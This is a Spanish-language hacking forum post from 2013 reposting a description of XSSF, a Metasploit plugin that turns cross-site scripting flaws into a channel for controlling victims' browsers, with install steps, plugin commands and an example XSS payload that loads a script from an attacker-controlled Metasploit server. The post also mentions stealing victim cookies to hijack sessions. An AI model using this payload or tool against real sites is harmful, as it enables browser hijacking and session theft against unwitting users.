comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Xssf Metasploit Plugin

  • 0 Respuestas
  • 2901 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Mayk0

  • *
  • Underc0der
  • Mensajes: 126
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Hacktivismo Latinoamerica
    • Email
  • Skype: maykozapata
« en: Junio 15, 2013, 02:52:51 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Description:
The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation
task into a much easier work. XSSF allows creating a communication channel with the targeted browser
(from a XSS vulnerability) in order to perform further attacks, its integration into the Metasploit Framework
allows users to launch MSF browser based exploit easilly from an XSS vulnerability,In addition, an interesting
though exploiting an XSS inside a victim's browser could be to browse website on attacker's browser,
using the connected victim's session. In most of cases, simply stealing the victim cookie will be sufficient
to realize this action... 'this tool requires metasploit installed to work'




Installation instructions:
1 - Download the latest Metasploit Framework (MSF) release
2 - Update Ruby to 1.9 if not already done
3 - open terminal and navigate to [ /opt/metasploit/../msf3 ] folder
4 - Download XSSF using SVN repository
[ svn export No tienes permisos para ver links. Registrate o Entra con tu cuenta ./ --force ]


XSSF plugin loading instructions:
1 - Start Metasploit Framework (MSF Console for example)
2 - Load XSSF plugin using the command 'load xssf'
3 - XSSF server port can be modified using the command 'load xssf Port=80'
4 - XSSF server URI can be changed using the command 'load xssf Uri=/'
5 - Example of XSS Attack: <script src=”http://IP-Server-MSF:Port/loop?interval=5”></script>


XSSF home:
[ No tienes permisos para ver links. Registrate o Entra con tu cuenta ]
Source Cod:
[ No tienes permisos para ver links. Registrate o Entra con tu cuenta ]
« Última modificación: Agosto 16, 2014, 10:42:54 am por Expermicid »
No tienes permisos para ver links. Registrate o Entra con tu cuenta

 

¿Te gustó el post? COMPARTILO!



Explotando "LNK" con MetaSploit 0-day

Iniciado por Devilboy

Respuestas: 0
Vistas: 1541
Último mensaje Julio 23, 2010, 03:14:24 pm
por Devilboy
Administrador Gráfico de Cyber Ataques para Metasploit

Iniciado por staRgan

Respuestas: 2
Vistas: 1888
Último mensaje Junio 26, 2011, 11:58:52 pm
por Ch05piN
Videos Metasploit desde básico hasta avanzado

Iniciado por dvdr

Respuestas: 24
Vistas: 19264
Último mensaje Abril 28, 2016, 11:40:55 am
por Satyricon
Cómo explotar vulnerabilidad de Windows 7 con Metasploit

Iniciado por Pekador

Respuestas: 2
Vistas: 4389
Último mensaje Abril 16, 2012, 04:35:47 pm
por SPELINAX
Dump skype account our victim for Metasploit

Iniciado por BrowserNet

Respuestas: 0
Vistas: 2296
Último mensaje Mayo 21, 2016, 08:10:13 pm
por BrowserNet